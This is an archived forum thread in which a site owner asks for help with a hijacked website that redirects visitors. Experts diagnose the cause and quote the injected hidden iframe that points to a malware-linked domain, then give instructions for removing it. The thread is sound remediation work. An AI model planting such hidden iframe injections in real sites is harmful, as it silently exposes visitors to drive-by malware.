Solved

Hijacked site

Posted on 2013-01-17
9
456 Views
Last Modified: 2013-12-06
I am trying to sort out another issue on the following site, however since I've posted the question and link to in on Expert Exchange, it seems that the site has been hijcked and is re-directing to another site. The site in question is:

http://www.neuproessentials.co.uk

this is what a previous expert had to say ID: 38790188

Used a hack / slave AV machive and get redirected to:
http://macskako.com/hmod.html giving :

Forbidden
You don't have permission to access /hmod.html on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

Open in new window

                                           
Any help on how to correct this would be greatly appreciated.

Thanks
0
Comment
Question by:smythers
9 Comments
 
LVL 1

Expert Comment

by:SirLagz
ID: 38792295
That site is working for me at the moment.
Going to a Neupro patches site ?
0
 

Author Comment

by:smythers
ID: 38792368
Yes, that's what it's meant to be doing but the experts who were trying to click on the link yesterday were getting redirected to some strange site and suggested I get it sorted here first.. Thanks for taking a look

I don't suppose you would be able to tell my why the video on this page will not work in IE 6, 7 or 8? That is my real problem.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794281
I'm getting redirected to:
http://macskako.com/hmod.html
in Google Chrome but not in IE8.

Forbidden
You don't have permission to access /hmod.html on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

This comment is at 19:00 GMT, just as a reference.

Right at the end of your http://www.neuproessentials.co.uk after the tracking script you have this:

<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>

Open in new window


Did you place that there?
0
PRTG Network Monitor: Intuitive Network Monitoring

Network Monitoring is essential to ensure that computer systems and network devices are running. Use PRTG to monitor LANs, servers, websites, applications and devices, bandwidth, virtual environments, remote systems, IoT, and many more. PRTG is easy to set up & use.

 
LVL 38

Expert Comment

by:BillDL
ID: 38794287
Now it loads the correct page in Chrome 2nd time around.

By the way, the domain macskako.com is registered in Budapast, Hungary.
http://www.dnsstuff.com/tools#whois/type=domain&&value=macskako.com&&
0
 
LVL 38

Accepted Solution

by:
BillDL earned 500 total points
ID: 38795825
Some Info:

http://evuln.com/tools/malware-scanner/www.neuproessentials.co.uk/

http://evuln.com/tools/malware-scanner/macskako.com/


Safe Browsing Diagnostic page for neuproessentials.co.uk valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=neuproessentials.co.uk/

What is the current listing status for neuproessentials.co.uk?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Google has not visited this site within the past 90 days.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, neuproessentials.co.uk did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

Safe Browsing Diagnostic page for macskako.com  valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=macskako.com/

What is the current listing status for macskako.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-11-17, and the last time suspicious content was found on this site was on 2012-11-17.
Malicious software includes 1 trojan(s).

This site was hosted on 1 network(s) including AS12301 (INVITEL).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, macskako.com appeared to function as an intermediary for the infection of 8 site(s) including showyai.com, techinspecialed.com, geocaching.com.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Search all your website's pages for this tag:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe>

Open in new window

and delete from <iframe> through to and including </iframe> for each instance.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 39345902
Thanks younghv
0
 
LVL 38

Expert Comment

by:younghv
ID: 39346032
Hey BillDL -
Glad to help.
I've been on hiatus for several months, but will endeavor (endeavour) to keep these caught up better.
Vic
0

Featured Post

Ransomware: The New Cyber Threat & How to Stop It

This infographic explains ransomware, type of malware that blocks access to your files or your systems and holds them hostage until a ransom is paid. It also examines the different types of ransomware and explains what you can do to thwart this sinister online threat.  

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

There are many reasons malware will stay around and continue to grow as a business.  The biggest reason is the expanding customer base.  More than 40% of people who are infected with ransomware, pay the ransom.  That makes ransomware a multi-million…
You cannot be 100% sure that you can protect your organization against crypto ransomware but you can lower down the risk and impact of the infection.
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

773 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question